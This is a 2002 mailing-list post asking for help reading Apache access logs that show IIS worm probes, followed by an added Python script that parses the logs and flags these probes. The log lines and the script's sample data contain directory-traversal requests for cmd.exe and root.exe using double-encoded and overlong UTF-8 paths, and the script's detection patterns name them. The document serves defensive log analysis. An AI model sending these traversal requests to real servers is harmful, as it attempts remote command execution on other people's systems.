[TriLUG] deciphering access logs

Andy Naylor anaylor at nc.rr.com
Thu Jan 3 19:07:51 EST 2002


Could anyone point me to some help on decoding access logs?

I've been getting this and others like them recently. I'd hate to have a
script kiddy. But I probably do.

Thanks,
Andy...
<snip>
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:04 -0500] "GET/MSADC/root.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 324 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 371 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
24.49.205.137 - - [01/Jan/2002:12:26:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:07 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
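Added example (not part of Andy's post or the TriLUG archive): a small Python script that decodes Apache Common Log Format lines the way the question asks and flags the request shapes quoted above. The entries are the well-known probe sequence of the IIS worms of late 2001 (root.exe, cmd.exe under /c/ and /d/, and the `%255c`, `%c1%1c`, `%c0%2f`, `%c0%af` directory-traversal encodings); a 404 on every one means the server had none of those paths, so the probes failed. The script double-decodes the path (so `%255c` becomes `\`) and folds the overlong UTF-8 sequences into the separators a vulnerable IIS would have seen, then reports what each line tried and how many hits came from each host. The sample log lines inside it are constructed to mirror the post's entries (plus one benign request); the function names, the `OVERLONG` table and the benign address 192.0.2.10 are this example's own choices.

```python
"""Flag IIS traversal / cmd.exe probes in Apache Common Log Format lines.

Added example, not code from the original post. SAMPLE_LOG is constructed
to resemble the post's entries; 192.0.2.10 is a documentation address.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD path proto" status size ...
# The method is anchored to letters so a missing space ("GET/MSADC/...")
# still splits into method and path.
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+)\s*(?P<path>\S*)\s*(?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Byte pairs that unpatched IIS decoded as path separators although they are
# not valid UTF-8 ("overlong" encodings). Table assumed for this example.
OVERLONG = {
    b"\xc0\xaf": b"/", b"\xc0\x2f": b"/",
    b"\xc1\x1c": b"\\", b"\xc1\x9c": b"\\",
}


def normalize_path(path: str) -> str:
    """Decode like a vulnerable server: twice (%255c -> %5c -> \\), then fold
    overlong UTF-8 into real separators and unify '\\' to '/'."""
    once = unquote(path, encoding="latin-1")      # latin-1 keeps raw bytes 1:1
    twice = unquote(once, encoding="latin-1")
    raw = twice.encode("latin-1")
    for seq, rep in OVERLONG.items():
        raw = raw.replace(seq, rep)
    return raw.decode("latin-1").replace("\\", "/")


def classify(path: str) -> list[str]:
    """Return the suspicious traits of one request path (empty if benign)."""
    findings = []
    norm = normalize_path(path).lower()
    if "%25" in path.lower():
        findings.append("double-encoded path")
    if re.search(r"%c[01]%[0-9a-f]{2}", path, re.I):
        findings.append("overlong UTF-8 in path")
    if "/../" in norm or norm.startswith("../"):
        findings.append("directory traversal")
    if "cmd.exe" in norm:
        findings.append("request for cmd.exe")
    if "root.exe" in norm:
        findings.append("request for root.exe (worm backdoor name)")
    return findings


def analyze(lines):
    """Parse each CLF line and keep only those with suspicious traits."""
    results = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not CLF: skip rather than guess
        findings = classify(m["path"])
        if findings:
            results.append({"host": m["host"], "status": int(m["status"]),
                            "path": m["path"], "findings": findings})
    return results


def summarize(results):
    """Hits per source host, and how many probes the server answered 404."""
    by_host = Counter(r["host"] for r in results)
    not_found = sum(1 for r in results if r["status"] == 404)
    return {"by_host": dict(by_host), "flagged": len(results), "not_found": not_found}


# Constructed sample, modelled on the post's log lines plus one normal request.
SAMPLE_LOG = """\
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:04 -0500] "GET/MSADC/root.exe?/c+dir HTTP/1.0" 404 314 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:05 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 "-" "-"
ny-lancaster1b-393.buf.adelphia.net - - [01/Jan/2002:12:26:06 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
24.49.205.137 - - [01/Jan/2002:12:26:06 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
192.0.2.10 - - [01/Jan/2002:12:30:00 -0500] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
""".splitlines()

if __name__ == "__main__":
    hits = analyze(SAMPLE_LOG)
    for r in hits:
        print(r["host"], r["status"], r["path"], "->", "; ".join(r["findings"]))
    print(summarize(hits))
```

Run it against a real access_log with `analyze(open("/var/log/httpd/access_log"))`; on an Apache box the 404s are the expected outcome, and the useful follow-up is the per-host count, which shows whether one source is running the whole sequence (automated scanning) or the hits are scattered.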